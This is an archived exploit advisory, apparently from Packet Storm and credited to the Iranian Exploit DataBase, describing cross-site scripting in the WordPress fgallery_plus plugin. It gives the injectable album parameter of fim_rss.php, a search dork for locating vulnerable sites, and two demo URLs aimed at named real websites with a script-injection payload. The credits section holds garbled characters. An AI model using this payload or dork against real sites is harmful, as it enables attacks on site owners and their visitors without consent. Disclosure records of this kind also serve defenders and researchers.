WordPress fGallery_Plus plugin suffers from multiple cross site scripting vulnerabilities. Note that this finding houses site-specific data.
c80371f254e0d3bfeab131b5f84077ce5fa288551f11fc15cd06775a35806a1c#################################
# Iranian Exploit DataBase Forum
# http://iedb.ir/acc
# http://iedb.ir
#################################
# Exploit Title : Wordpress fgallery_plus Plugin Xss vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : IeDb.Team@Gmail.com
# Home : http://iedb.ir - http://iedb.ir/acc
# Software Link : http://wordpress.org/
# Security Risk : High
# Tested on : Linux
# Dork : inurl:/plugins/fgallery_plus/
#################################
# Exploit :
# http://site.com/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]
# Dem0 :
# http://allanmc.dk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3"><script>alert(/IeDb.Ir/)</script>
# http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3"><script>alert(/IeDb.Ir/)</script>
#################################
# Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - F�±��iD - Medrik - Dj.TiniVini - dr.koderz - z3r0 - Mr Zer0
# B3hz4d - C0dex - Behnam Vanda - ErfanMs - E2MA3N - S!Y0U.T4r.6T - ���¿4���� �¦3�¿�¿ - 0x0ptim0us - ARTA
# & All Member In Iedb.ir/acc & Iranian Hackers
#################################
# Exploit Archive = http://www.iedb.ir/exploits-584.html
#################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed